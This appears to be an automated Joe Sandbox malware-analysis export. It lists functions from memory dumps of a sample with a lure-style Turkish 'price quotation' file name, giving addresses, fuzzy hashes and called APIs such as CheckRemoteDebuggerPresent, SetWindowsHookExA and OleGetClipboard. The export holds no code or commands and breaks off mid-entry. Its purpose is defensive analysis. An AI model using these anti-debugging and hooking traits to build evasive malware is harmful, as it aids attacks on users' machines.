Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: d5acf60ef33e67f7081da84a3ca1af55087fabe6baf07e084117aef6b8b8423d
Instruction ID: 0f231b26ab3c422edcc8abd051bdf12054d02e7b48acc14f682b2ac547174647
Opcode Fuzzy Hash: d5acf60ef33e67f7081da84a3ca1af55087fabe6baf07e084117aef6b8b8423d
Instruction Fuzzy Hash: 5722F471F002058FDF60DBA6C5846AEB7B2EF89310F208469EA05EB395DB71DD41CB92

Function 027D7EE8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 027D7F5F

Memory Dump Source

Source File: 00000008.00000002.4148561130.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_27d0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: f63ae2d5481c99fda43aa4a989b166f1831430d927226495cf7747c741a4aca4
Instruction ID: 7700c6ac1392c4ffd0a15d0c2e923fb4c9b6bc3e271c9ddab74c24bccc5aad94
Opcode Fuzzy Hash: f63ae2d5481c99fda43aa4a989b166f1831430d927226495cf7747c741a4aca4
Instruction Fuzzy Hash: 122139B18002598FCB14CF9AD444BEEFBF4EF49310F15846AE459A7351D778A944CF61

Function 06862410 Relevance: 1.0, Instructions: 1011COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d398b7d2daeda7338257930982307fd046876e0a0e692adf27cdfdaaff90906
Instruction ID: b8dac81912d148d9c0ea56e3b2e06d3ca644d26b3128cbcfa1dd7faed63838c2
Opcode Fuzzy Hash: 8d398b7d2daeda7338257930982307fd046876e0a0e692adf27cdfdaaff90906
Instruction Fuzzy Hash: 52925434E002048FDBA0DB69C598A6DBBF2FB45314F5488A9E509EB365DB35ED85CB80

Function 068662B8 Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84264084558980b8903d1fb7e4d52821dbc98bd417fa5fef5bc4429e08f211cd
Instruction ID: 9b4c22b6049e3c95e70bbbee57054a37985fe9bfc2b12e45ff188b8b450be9b9
Opcode Fuzzy Hash: 84264084558980b8903d1fb7e4d52821dbc98bd417fa5fef5bc4429e08f211cd
Instruction Fuzzy Hash: 4662F030B002449FDB54DB69D550BADB7F2EF84314F148469E906EB395EB31ED82CB92

Function 0686C248 Relevance: .6, Instructions: 644COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb1687321abc6d3a5b0c3dd4832199d04c1af953d0c193f19713e924bfd1aad6
Instruction ID: 5d98acff2a86dc4a2c04862996338447505e9aa455ef6e181cf0caed0066e4f1
Opcode Fuzzy Hash: cb1687321abc6d3a5b0c3dd4832199d04c1af953d0c193f19713e924bfd1aad6
Instruction Fuzzy Hash: 4F328030B002199FDB60DB69D984BADB7F2FB89310F108969E549EB395DB34EC41CB91

Function 0686B2E7 Relevance: .6, Instructions: 562COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16533aab98a138d3c11a60f4cc4d30e18e3416cfae63a54dd08b562c83b10e15
Instruction ID: 8bef87583e0da4b61d618420f0de3e98904d3eff2e36c75fde3325e7c7fbb427
Opcode Fuzzy Hash: 16533aab98a138d3c11a60f4cc4d30e18e3416cfae63a54dd08b562c83b10e15
Instruction Fuzzy Hash: 64226F70E102098BDF64DB6AD5847AEB7F2EB89318F608425F609EB391DB34DC91CB51

Function 0686AD90 Relevance: 10.4, Strings: 8, Instructions: 390
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 0686AF68
$dq, xrefs: 0686AF33
$dq, xrefs: 0686AEBD
$dq, xrefs: 0686AF3F
$dq, xrefs: 0686AF10
$dq, xrefs: 0686AEB1
$dq, xrefs: 0686AF04
$dq, xrefs: 0686AF5C

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-634254105
Opcode ID: cc0703c55cd556c02141a5b6a99a910efd1e71d1deb7e28a2f4c85d7954ca778
Instruction ID: 1efb35e0d68daf9ac0c44405f95dee4c839750a7b9148e186b20b8009d79f448
Opcode Fuzzy Hash: cc0703c55cd556c02141a5b6a99a910efd1e71d1deb7e28a2f4c85d7954ca778
Instruction Fuzzy Hash: E0E1A130E102198FCB69DF6AD5806AEB7F3FF89305F208929E505EB354DB709946CB91

Function 0686B708 Relevance: 8.0, Strings: 6, Instructions: 471
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 0686BC47
$dq, xrefs: 0686BCAF
$dq, xrefs: 0686BC3B
$dq, xrefs: 0686BC6F
$dq, xrefs: 0686BC7B
$dq, xrefs: 0686BCA3

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-2331353128
Opcode ID: b474e826a09c55c8a5da7fa1b6f00d651cbdc0156db295508e81e25bc59d5cb2
Instruction ID: dd38e5893c7fee7a71e366db11659305039cd425bc9e666191224554f30500e8
Opcode Fuzzy Hash: b474e826a09c55c8a5da7fa1b6f00d651cbdc0156db295508e81e25bc59d5cb2
Instruction Fuzzy Hash: 60029F30E102198FDBA4DF6AD4806ADB7B2FF45319F20892AE516EB351DB30DD91CB91

Function 067F6EC1 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 067F6F4E
GetCurrentThread.KERNEL32 ref: 067F6F8B
GetCurrentProcess.KERNEL32 ref: 067F6FC8
GetCurrentThreadId.KERNEL32 ref: 067F7021

Memory Dump Source

Source File: 00000008.00000002.4162660725.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_67f0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 9f05f65822c655a27e2628cf626d3c75357e3a348e94e5df61ea5c5feacc7c39
Instruction ID: c3ece73b340ba13b184483a5aa342348de058164ac3a44f459a2855c7648f5bf
Opcode Fuzzy Hash: 9f05f65822c655a27e2628cf626d3c75357e3a348e94e5df61ea5c5feacc7c39
Instruction Fuzzy Hash: FF5186B09013498FDB98DFA9C948BAEBBF1EF48314F20845DE109A7391D7359984CF21

Function 067F6ED0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 067F6F4E
GetCurrentThread.KERNEL32 ref: 067F6F8B
GetCurrentProcess.KERNEL32 ref: 067F6FC8
GetCurrentThreadId.KERNEL32 ref: 067F7021

Memory Dump Source

Source File: 00000008.00000002.4162660725.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_67f0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 9cd44595b5cca9d0fb6e5babe8029a2f0b65b40b86c81fd2aa4fd63b61267136
Instruction ID: adf17adccaa10574ff22b1cafb2237e724e7c61aeac18fa7464192ce48273bdc
Opcode Fuzzy Hash: 9cd44595b5cca9d0fb6e5babe8029a2f0b65b40b86c81fd2aa4fd63b61267136
Instruction Fuzzy Hash: 215188B0901309CFDB58DFAAD948BAEBBF5EF48314F208459E119A7390DB359984CF61

Function 06868E10 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 06868E92
$dq, xrefs: 06868E63
$dq, xrefs: 06868E57
$dq, xrefs: 06868E9E

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq
API String ID: 0-185584874
Opcode ID: ff1328154b9f1f4862ded6ee365dedd9869afd5c696f5a6f0410cd95aba18f64
Instruction ID: 577a68766be1ed6db5ad2ef1ceb8ebe07c660776b7edd9d8bd38ebc0a7fe8cd4
Opcode Fuzzy Hash: ff1328154b9f1f4862ded6ee365dedd9869afd5c696f5a6f0410cd95aba18f64
Instruction Fuzzy Hash: BD919230B0021A9FDF54DF69D9507AEB3F6AF84300F108569D909EB384EE70AD428B91

Function 0686D000 Relevance: 4.6, Strings: 3, Instructions: 801
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 0686D3FB
$dq, xrefs: 0686D3F3
$dq, xrefs: 0686D407

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq
API String ID: 0-2861643491
Opcode ID: fe199c7a09977cede901f0302c32c49fa8b1cdd4c34c8cab0b525dbfbf7c7f38
Instruction ID: 4a3662ab4e0189a9459146118ecdc9cdd7ccf8eb88c863c979abcfef1f710987
Opcode Fuzzy Hash: fe199c7a09977cede901f0302c32c49fa8b1cdd4c34c8cab0b525dbfbf7c7f38
Instruction Fuzzy Hash: 8E622C30B006158FCB65EB69D580A5EB7F2FF94305F208A68E4099F359DB71ED86CB90

Function 0686E442 Relevance: 4.0, Strings: 3, Instructions: 205
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oGp, xrefs: 0686E4F0
PHdq, xrefs: 0686E6B8
DqGp, xrefs: 0686E4FC

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: 0oGp$DqGp$PHdq
API String ID: 0-1641917722
Opcode ID: 4c2f2c75a185e28ada650f8c35fbcc4d7fecc33c0da2de7ceceefa6a02d90925
Instruction ID: d81383d74294b3bf3e75d5257ea16890b9dd76017d4be8aab007e8b79511cdfb
Opcode Fuzzy Hash: 4c2f2c75a185e28ada650f8c35fbcc4d7fecc33c0da2de7ceceefa6a02d90925
Instruction Fuzzy Hash: A8817A347106048FCBA4DF3AD498A6DBBF2EF89311B2185A9E606DB365DB71EC41CB50

Function 06864830 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Oiq, xrefs: 068649E7
fiq, xrefs: 06864F3D
XPiq, xrefs: 0686495D

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: fiq$XPiq$\Oiq
API String ID: 0-1639307521
Opcode ID: bb4117989f7c863e4d694c4d1c6426483a2c6094fdc7972f329a445ca9943cf6
Instruction ID: ded0d2950f1ad5f5145c5bb44b36cb06bda70c449a6f0d712539134e65d28a5d
Opcode Fuzzy Hash: bb4117989f7c863e4d694c4d1c6426483a2c6094fdc7972f329a445ca9943cf6
Instruction Fuzzy Hash: 0B615071F002189FEB54DFA9C8147AEBAF6EF88310F208429E109EB395DB758D458F95

Function 06868E01 Relevance: 2.7, Strings: 2, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 06868E92
$dq, xrefs: 06868E57

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: $dq$$dq
API String ID: 0-2340669324
Opcode ID: cd0482e09405ffb48f49dfe42a46857761c2917ba03fefda7c93f4878e3f8e13
Instruction ID: 84af807313e25861b06d853da791d66c8c5dcf52a53322088c9618071b9a6b79
Opcode Fuzzy Hash: cd0482e09405ffb48f49dfe42a46857761c2917ba03fefda7c93f4878e3f8e13
Instruction Fuzzy Hash: 6F519570B002159FDF54EB79D850B6FB7F6AF84600F108469D909D7384EA70AC02CB91

Function 027DF5A8 Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4148561130.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_27d0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4835746b725f5c294ff2a443feae1638b8cb0fb4280eecf155c61e2c6a4edf45
Instruction ID: 5efa78776c955888fdcbbc7180414c23fdbeba1afbe9b829cce23f1d6b495130
Opcode Fuzzy Hash: 4835746b725f5c294ff2a443feae1638b8cb0fb4280eecf155c61e2c6a4edf45
Instruction Fuzzy Hash: 93415672D047958FCB11CF69D8042AEBFF1AF89310F0585AAD44AE7791DB349845CBE1

Function 067F34CF Relevance: 1.6, APIs: 1, Instructions: 139COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 067F35EA

Memory Dump Source

Source File: 00000008.00000002.4162660725.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_67f0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 2938139cc7eeaa40b3c8d1584d610de26671f0b94cb46fcf0b49460ba2428d02
Instruction ID: e887e1cdd364c28b45359f66b239543e86b48edc300bf0a3eb14a489463490b9
Opcode Fuzzy Hash: 2938139cc7eeaa40b3c8d1584d610de26671f0b94cb46fcf0b49460ba2428d02
Instruction Fuzzy Hash: 5151D2B1C10209AFDF15CFA9D884ADDBBB5BF49310F24852AE919AB210D7719945CF90

Function 067F6D41 Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,067F82B5), ref: 067F833F

Memory Dump Source

Source File: 00000008.00000002.4162660725.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_67f0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: cf837b3dfa0ecbf09f07d653c2e94c6c38977af01e28c203f8a809f543b99ca2
Instruction ID: c9ecd72692caab53b107f3df8cb6c7ed59777e7854a4d959d78e670259622087
Opcode Fuzzy Hash: cf837b3dfa0ecbf09f07d653c2e94c6c38977af01e28c203f8a809f543b99ca2
Instruction Fuzzy Hash: 8E4187B58143498FCB50CF99C844BEABBF4EF88320F24885AD518A7351C375A844CFA6

Function 067F34D8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 067F35EA

Memory Dump Source

Source File: 00000008.00000002.4162660725.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_67f0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c80b5de8fc7ef63579a357f576380e8dbf9bf63597dfceba76f2b6a1fd179db8
Instruction ID: b90f39d2017d6804d99c546b305424985e070eacbb5eb1f8eb45e9667a481adb
Opcode Fuzzy Hash: c80b5de8fc7ef63579a357f576380e8dbf9bf63597dfceba76f2b6a1fd179db8
Instruction Fuzzy Hash: F141B0B1D10349DFDB14CF9AC884ADEBBB5BF88310F24852AE919AB310D7719885CF90

Function 067F6D14 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 067F8069

Memory Dump Source

Source File: 00000008.00000002.4162660725.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_67f0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 894dd1f105a2cc50b27287c6f0cd0c5c2457b4873191e9fb4b67a58e9a6baee1
Instruction ID: 5ae917541ecd5660197ee46da6d0199972deb3ec356443072d9631efe7e8b87e
Opcode Fuzzy Hash: 894dd1f105a2cc50b27287c6f0cd0c5c2457b4873191e9fb4b67a58e9a6baee1
Instruction Fuzzy Hash: F04138B4910305CFDB54CF59C848EAABBF5FB88314F24C459D619A7321D375A940CFA1

Function 067F8CE9 Relevance: 1.6, APIs: 1, Instructions: 72comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 067F8D78

Memory Dump Source

Source File: 00000008.00000002.4162660725.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_67f0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: bf1c40334091a3120bc8c71177873657fa3cf04b9e864b8366f1420083456ea6
Instruction ID: 1421399f21090a151ff77b9ddb972756c3e3e9a03acd63c815adbffd4bbc6dd8
Opcode Fuzzy Hash: bf1c40334091a3120bc8c71177873657fa3cf04b9e864b8366f1420083456ea6
Instruction Fuzzy Hash: 2F31DEB0D11208DFDB54DF99C984B9EBBF5AF48304F20845AE509BB390DB74A945CB62

Function 067F8CF0 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 067F8D78

Memory Dump Source

Source File: 00000008.00000002.4162660725.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_67f0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: fd338d5f9cf69f6f0c6c2d889cf094e1c72de07f78df70921f358a8718c04f7e
Instruction ID: ce9b51253248f4e375602e61b3dbe9c7f347f95006e970736bc867d620ca6877
Opcode Fuzzy Hash: fd338d5f9cf69f6f0c6c2d889cf094e1c72de07f78df70921f358a8718c04f7e
Instruction Fuzzy Hash: 7331F1B0D11208DFDB14DF99C984B9EBBF5AF48304F20805AE504BB390DB74A845CB56

Function 027D7EE1 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 027D7F5F

Memory Dump Source

Source File: 00000008.00000002.4148561130.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_27d0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 40a976e66f705df7f586f2ac658ec7ae4f698c20e093defe0f87e7e00da4bd26
Instruction ID: 9a26bfd8635e152fb92a83f6b88645934632bec74813d8988c6dd0ed85a4917e
Opcode Fuzzy Hash: 40a976e66f705df7f586f2ac658ec7ae4f698c20e093defe0f87e7e00da4bd26
Instruction Fuzzy Hash: 442169B18002598FCB14CFAAC845BEEFBF4EF49310F14846AE459A7340C738A944CF60

Function 067F7110 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 067F719F

Memory Dump Source

Source File: 00000008.00000002.4162660725.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_67f0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 04684f7e24e53cddbed973966caa0bbe8bab006536187b0343d4d34e1fcea295
Instruction ID: 58a3ca240f0b69cd059e3cc0111cfde4339d1396f32a56461ab4e7f8dfc20a93
Opcode Fuzzy Hash: 04684f7e24e53cddbed973966caa0bbe8bab006536187b0343d4d34e1fcea295
Instruction Fuzzy Hash: 812116B5D003489FDB10CFAAD884ADEBFF9EB48310F14841AE954A3311C374A944CFA1

Function 067F7118 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 067F719F

Memory Dump Source

Source File: 00000008.00000002.4162660725.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_67f0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9e403058d9aacad11bc8326c716c0e817c014fc8fae7fa38237f56680340d8d6
Instruction ID: 8f750fb9508201e0cd45a8faca759df63877fc6cf5b32fa6dd06b3cf36867fc7
Opcode Fuzzy Hash: 9e403058d9aacad11bc8326c716c0e817c014fc8fae7fa38237f56680340d8d6
Instruction Fuzzy Hash: EA21E2B5D002489FDB10CFAAD884ADEBBF9EB48320F14841AE918A3350D374A944CFA5

Function 067FA7E8 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 067FA863

Memory Dump Source

Source File: 00000008.00000002.4162660725.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_67f0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: ee03ba6bc5aaf938485a5159083431d0b74f9b1e18549bb26ea76e790e086d1f
Instruction ID: 40dc4f444b330797d8d903be2f25fbe5f2f50d869f374363a1ee9eeb0e4877ea
Opcode Fuzzy Hash: ee03ba6bc5aaf938485a5159083431d0b74f9b1e18549bb26ea76e790e086d1f
Instruction Fuzzy Hash: 152102B5D002499FCB54DF9AC844BEEBBF5AB88310F10842AD419A7390C774A945CFA1

Function 067FA7E3 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 067FA863

Memory Dump Source

Source File: 00000008.00000002.4162660725.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_67f0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 9e5aa1121c2cdfc9aab36c9422d67619b79da90f36ca378c8ecd4cbde6fbf60e
Instruction ID: b616bb2bf1abbe0a9723dbdffb30073dc9996fd31d159bcfda589927259ddf31
Opcode Fuzzy Hash: 9e5aa1121c2cdfc9aab36c9422d67619b79da90f36ca378c8ecd4cbde6fbf60e
Instruction Fuzzy Hash: CD2102B5D00249DFCB54DF9AC848BEEBBF5AB88310F10842AE419A7290C774A945CFA1

Function 027DF690 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 027DF6F7

Memory Dump Source

Source File: 00000008.00000002.4148561130.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_27d0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 7ec9b91383303bc554ee1c96c6cb3ba1d533e30ccdd62a8fdf7079783e43a262
Instruction ID: 10ae4056fc6a57bd0cf591847692d620d77f4ad4ae05db0d45482d29d2079226
Opcode Fuzzy Hash: 7ec9b91383303bc554ee1c96c6cb3ba1d533e30ccdd62a8fdf7079783e43a262
Instruction Fuzzy Hash: ED1112B1C006599BCB10DF9AC844BDEFBF4EF48320F11816AD818B7240D778A944CFA5

Function 067F242B Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 067F2496

Memory Dump Source

Source File: 00000008.00000002.4162660725.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_67f0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9fb3d046e825f4ba365b332221ac326d51973c8bacefde31468ec81ba867f5ce
Instruction ID: 95e11d09fc120fa5d9d5c0011ca9ee5b997855df65e74192d6eee329df046b85
Opcode Fuzzy Hash: 9fb3d046e825f4ba365b332221ac326d51973c8bacefde31468ec81ba867f5ce
Instruction Fuzzy Hash: 061132B5C007498FCB10DF9AC844ADEFBF4EB89220F10852AD429B7251C375A645CFA1

Function 067F0A44 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 067F2496

Memory Dump Source

Source File: 00000008.00000002.4162660725.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_67f0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a0fc27b0ecda402abf04a79fe46f2bd58888c710e5ce21ac84d9f421c6fa71eb
Instruction ID: 63613a070709f4f1e6872fb7e7c913b9675e03761a251572be775e8fe2ace9c8
Opcode Fuzzy Hash: a0fc27b0ecda402abf04a79fe46f2bd58888c710e5ce21ac84d9f421c6fa71eb
Instruction Fuzzy Hash: 3011F3B5C107498FDB50DF9AC444AAEFBF4EB48214F10842AD529B7311C3B5AA45CFA5

Function 067F6EB4 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 067F8BFD

Memory Dump Source

Source File: 00000008.00000002.4162660725.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_67f0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: acd3069ced3aacc7fea5436eea9f2682e15db999ba07e007cde307d95f07f5a3
